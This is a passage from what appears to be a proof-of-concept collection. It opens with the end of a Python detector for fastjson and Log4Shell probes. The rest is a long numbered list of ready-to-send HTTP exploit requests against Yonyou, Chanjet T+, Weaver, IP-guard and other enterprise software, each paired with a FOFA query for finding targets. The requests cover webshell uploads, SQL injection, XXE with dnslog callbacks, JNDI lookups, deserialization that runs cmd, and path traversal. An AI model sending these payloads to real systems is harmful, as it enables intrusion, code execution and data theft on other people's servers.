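NESTED_LOOKUP = re.compile(r'\$\{[^}]*\$\{')
# Host part of any outbound URL the payload wants the server to contact.
CALLBACK_URL = re.compile(r'\b(?:ldaps?|rmi|dns|iiop|https?)://([^\s"\'/}]+)', re.I)

# Assumed starter list: java.net.URL / InetAddress trigger DNS resolution,
# JdbcRowSetImp and TemplatesImpl are classic fastjson RCE gadgets. Extend per deployment.
DANGEROUS_TYPES = frozenset({
    "java.net.URL",
    "java.net.InetAddress",
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
})


def inspect_body(body: str) -> Dict[str, object]:
    """Collect indicators from the raw body; never rely on it parsing."""
    try:
        json.loads(body)
        valid = True
    except ValueError:
        valid = False  # fastjson probes are often malformed on purpose, as in entry 21
    types = TYPE_KEY.findall(body)
    return {
        "valid_json": valid,
        "types": types,
        "dangerous_types": [t for t in types if t in DANGEROUS_TYPES],
        "jndi": bool(JNDI_LOOKUP.search(body)),
        "nested_lookup": bool(NESTED_LOOKUP.search(body)),
        "callback_hosts": sorted(set(CALLBACK_URL.findall(body))),
    }


def verdict(body: str) -> str:
    """'block' for a known-bad shape, 'review' for a suspicious one, 'allow' otherwise."""
    r = inspect_body(body)
    if r["jndi"] or r["nested_lookup"] or r["dangerous_types"]:
        return "block"
    if r["types"] or r["callback_hosts"]:
        return "review"
    return "allow"


# Constructed samples: copies of the bodies from entries 21/23 and 22, a benign
# login check, and an obfuscated lookup of the kind seen in Log4Shell traffic.
FASTJSON_PROBE = '''{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}'''
LOG4J_PROBE = '{"loginName":"${jndi:ldap://dnslog}"}'
OBFUSCATED_PROBE = '{"loginName":"${${lower:j}ndi:ldap://203.0.113.7:1389/a}"}'
BENIGN_BODY = '{"loginName":"admin"}'

if __name__ == "__main__":
    for name, body in [("fastjson", FASTJSON_PROBE), ("log4j", LOG4J_PROBE),
                       ("obfuscated", OBFUSCATED_PROBE), ("benign", BENIGN_BODY)]:
        print(name, verdict(body), inspect_body(body)["callback_hosts"])
```

The callback hosts are the most actionable output: the DNS names in these probes identify the operator's logging service, and egress from an ICC or NC server to LDAP or RMI ports should be denied outright regardless of what the request body looked like.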
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then served at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC657
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
}
}
}
}

Step 2: request the following URL to confirm the file was written:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
}
}
}
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"

GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, so the export handler takes an arbitrary query, not an identifier.

61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
